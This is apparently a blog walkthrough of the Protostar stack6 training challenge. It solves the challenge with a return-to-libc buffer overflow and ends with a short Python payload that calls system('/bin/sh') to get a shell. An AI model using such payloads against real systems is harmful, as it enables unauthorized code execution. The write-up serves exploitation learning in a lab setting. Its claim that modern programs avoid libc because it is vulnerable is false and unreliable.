Hello hackers! hope you are all doing well. It’s been a while since I posted something on my medium page. So without wasting any more of our precious time let us jump straight into hacking.
This particular challenge can be solved in multiple ways but the method I am about to adopt is ret2libc.
So first off…What is libc????
Well, libc stands for the library of c. It contains all the functions that a c program needs. For most of the programs that are coded these days, libc library is not involved at all because it is quite vulnerable.
Now you may wonder..how possibly could a library full of c functions be exploited?
How is it vulnerable?
There is a particular function at c that we are PaRtIcUlArLy interested at( ಠ◡ಠ ). Its called the system function. Inside this system function, we have the command to pop open a shell on any system by simply calling it. We will be basically manipulating our payload to call the libc and executing the system("/bin/sh").
As the diagram suggests, first we call the system function, and then at 4 bytes offset we have our /bin/sh.
ENOUGH LECTURE! IT’S BOOORING….. let's start hamking!
/opt/protostar/bin/stack6
Okay, It's time to assemble our avengers(addresses).
First thing’s first let's find our exact offset.
char buffer[64];
unsigned int ret;From the program, we understand that we have about 4 bytes of ret on top of the stack and then 64 bytes of buffer space to overcome and then 4 bytes to overcome ebp. Now, all we have to find is the exact amount of padding that we need. After a few trials and errors, I found out that it's about 8 bytes.
So we have 4+64+4+8=80 bytes to reach the eip region. Now, all we have to do is find our system and bin_sh. These are the commands and methods to be followed:
First, open gdb, break main and then run the program once. Once the program is finished running. We can see our program’s process dynamically being linked to libc with the following command:
info proc mapping
Onto finding our /bin/sh inside libc. We can do so by the following command line (strings -a -t x ‘starting name of libc.so’) | grep ‘/bin/sh’. Which in our case would look like this:
(strings -a -t x /lib/libc-2.11.2.so) | grep ‘/bin/sh’
Now we have to add the first address of libc and the value we received with the help of strings.
AND VOILA!! we have our /bin/sh address from libc. One more address is needed to solve our puzzle which is the address of system. it is soo simple to find all we have to do is:
p system
Its time to put all these pieces together.
EXPLOITATION
Like I told earlier our payload must contain enough buffer to get to eip region and then return to libc, call the system function, and pop open a shell using /bin/sh.
Putting all this together in a python file called xpl.py and we get this:
padding = ‘A’*80
system= ‘\xb0\xff\xec\xb7’
ret=’C’*4
sh = ‘\xbf\x63\xfb\xb7’
print padding + system + ret+ sh
And that’s it folks we have got our shell. Hope you gained some bit of knowledge and understanding from this write-up. If you did, please do consider liking my writeups, and if not…….still consider liking it pleeeeeeaseeee.
Goodbye and happy hacking( ◜◒◝ )♡
